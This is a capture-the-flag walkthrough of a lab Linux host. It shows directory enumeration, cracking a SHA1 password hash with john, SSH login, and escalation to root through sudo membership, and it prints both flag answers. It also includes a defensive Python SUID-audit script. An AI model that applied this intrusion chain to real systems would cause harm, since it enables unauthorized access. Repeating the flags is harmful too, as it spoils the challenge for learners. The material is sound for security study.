80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.17 seconds

Gobuster Enumeration of HTTP server

gobuster dir -u http://10.10.17.221 -w /usr/share/wordlists/dirb/big.txt 
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.17.221
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/big.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2021/05/16 20:06:49 Starting gobuster in directory enumeration mode
===============================================================
/.htaccess            (Status: 403) [Size: 277]
/.htpasswd            (Status: 403) [Size: 277]
/secret               (Status: 301) [Size: 313] [--> http://10.10.17.221/secret/]
/server-status        (Status: 403) [Size: 277]                                  
                                                                                 
===============================================================
2021/05/16 20:12:36 Finished
===============================================================

Gobuster enumeration of secret directory with txt extension

$ gobuster dir -x txt -w /usr/share/wordlists/dirb/common.txt -t 100 -u http://10.10.17.221/secret -b 403,404
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.17.221/secret
[+] Method:                  GET
[+] Threads:                 100
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   403,404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              txt
[+] Timeout:                 10s
===============================================================
2021/05/16 20:17:19 Starting gobuster in directory enumeration mode
===============================================================
/index.html           (Status: 200) [Size: 0]
/secret.txt           (Status: 200) [Size: 46]
                                              
===============================================================
2021/05/16 20:17:36 Finished
===============================================================

Cracking the Hash in nyan.txt

$ john --format=raw-sha1 --wordlist=/usr/share/wordlists/rockyou.txt secret.txt 
Using default input encoding: UTF-8
Loaded 1 password hash (Raw-SHA1 [SHA1 256/256 AVX2 8x])
Press 'q' or Ctrl-C to abort, almost any other key for status
nyan             (?)
1g 0:00:00:00 DONE (2021-05-16 20:20) 1.408g/s 7000Kp/s 7000Kc/s 7000KC/s nyan042077..nyamwaro
Use the "--show --format=Raw-SHA1" options to display all of the cracked passwords reliably
Session completed

user.txt

  • Answer: supernootnoot

  • Steps to Reproduce:

    • Log in over SSH as nyan, using the password nyan cracked above:

$ ssh nyan@10.10.17.221

The authenticity of host '10.10.17.221 (10.10.17.221)' can't be established.
ECDSA key fingerprint is SHA256:haqegvkQqmIEEzS0Mcd+NUsONboBQ6z3wQSwq+aj5Es.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.17.221' (ECDSA) to the list of known hosts.
nyan@10.10.17.221's password: 
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.4.0-142-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage
Last login: Sat Dec 21 08:37:54 2019

nyan@ubuntu:~$ id
uid=1000(nyan) gid=1000(nyan) groups=1000(nyan),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),114(lpadmin),115(sambashare)

nyan@ubuntu:~$ ls
user.txt

nyan@ubuntu:~$ cat user.txt
supernootnoot

Privilege Escalation - Abusing SUID

  • Locate the files with SUID bit set:

nyan@ubuntu:~$ find / -type f -perm /4000 2>/dev/null
/bin/mount
/bin/umount
/bin/ntfs-3g
/bin/ping6
/bin/su
/bin/ping
/bin/fusermount
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/bin/passwd
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/sudo
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/vmware-user-suid-wrapper

  • Abusing the SUID bit of sudo to get root access: the id output above shows nyan is a member of the sudo group (27(sudo)), so sudo su drops straight into a root shell.

nyan@ubuntu:~$ sudo su

root@ubuntu:/home/nyan# id
uid=0(root) gid=0(root) groups=0(root)
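The find command above is also what a defender runs to audit a host: any SUID binary that is not in the distribution's baseline deserves a look, since a stray one is a classic privilege-escalation and persistence foothold. This added example (not from the original write-up) does the same walk in Python and diffs the result against a baseline constructed from the list the write-up found; make_sample_tree builds a throwaway directory for the demo.

```python
import os
import stat
import tempfile

# Baseline constructed from the SUID files the write-up's find command listed on
# this Ubuntu 16.04 box; on a real fleet, record it from a known-good image.
EXPECTED_SUID = {
    "/bin/mount", "/bin/umount", "/bin/ntfs-3g", "/bin/ping6", "/bin/su",
    "/bin/ping", "/bin/fusermount", "/usr/lib/eject/dmcrypt-get-device",
    "/usr/lib/openssh/ssh-keysign", "/usr/lib/dbus-1.0/dbus-daemon-launch-helper",
    "/usr/bin/passwd", "/usr/bin/chsh", "/usr/bin/chfn", "/usr/bin/sudo",
    "/usr/bin/newgrp", "/usr/bin/gpasswd", "/usr/bin/vmware-user-suid-wrapper",
}


def find_suid(root: str = "/") -> list:
    """Equivalent of `find ROOT -type f -perm /4000 2>/dev/null`: regular files
    with the set-uid bit set. Symlinks are not followed and unreadable
    directories or vanished files are skipped, like the 2>/dev/null."""
    found = []
    for dirpath, _, filenames in os.walk(root, onerror=lambda err: None):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                found.append(path)
    return sorted(found)


def audit_suid(found, expected=EXPECTED_SUID) -> dict:
    """Diff a scan against the baseline. 'unexpected' is the list to
    investigate; 'missing' usually means a package was removed or the
    baseline is for a different image."""
    found = set(found)
    return {
        "unexpected": sorted(found - expected),
        "missing": sorted(expected - found),
    }


def make_sample_tree() -> tuple:
    """Constructed fixture: a temp dir with one SUID file, one plain file and a
    symlink to the SUID file. Returns (root, path of the real SUID file)."""
    root = tempfile.mkdtemp(prefix="suid-audit-")
    suid = os.path.join(root, "bin", "helper")
    plain = os.path.join(root, "bin", "tool")
    os.makedirs(os.path.dirname(suid))
    for p in (suid, plain):
        with open(p, "w") as fh:
            fh.write("#!/bin/sh\n")
    os.chmod(suid, 0o4755)   # -rwsr-xr-x: the set-uid bit is what we hunt for
    os.chmod(plain, 0o755)   # -rwxr-xr-x: ordinary executable, must not match
    os.symlink(suid, os.path.join(root, "link-to-helper"))  # must not match
    return root, suid


if __name__ == "__main__":
    root, _ = make_sample_tree()
    print("sample tree:", find_suid(root))
    print("this host:", audit_suid(find_suid("/")))
```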

root.txt

  • Answer: congratulations!!!!

  • Steps to Reproduce:

root@ubuntu:/home/nyan# cd 

root@ubuntu:~# ls
root.txt

root@ubuntu:~# cat root.txt
congratulations!!!!
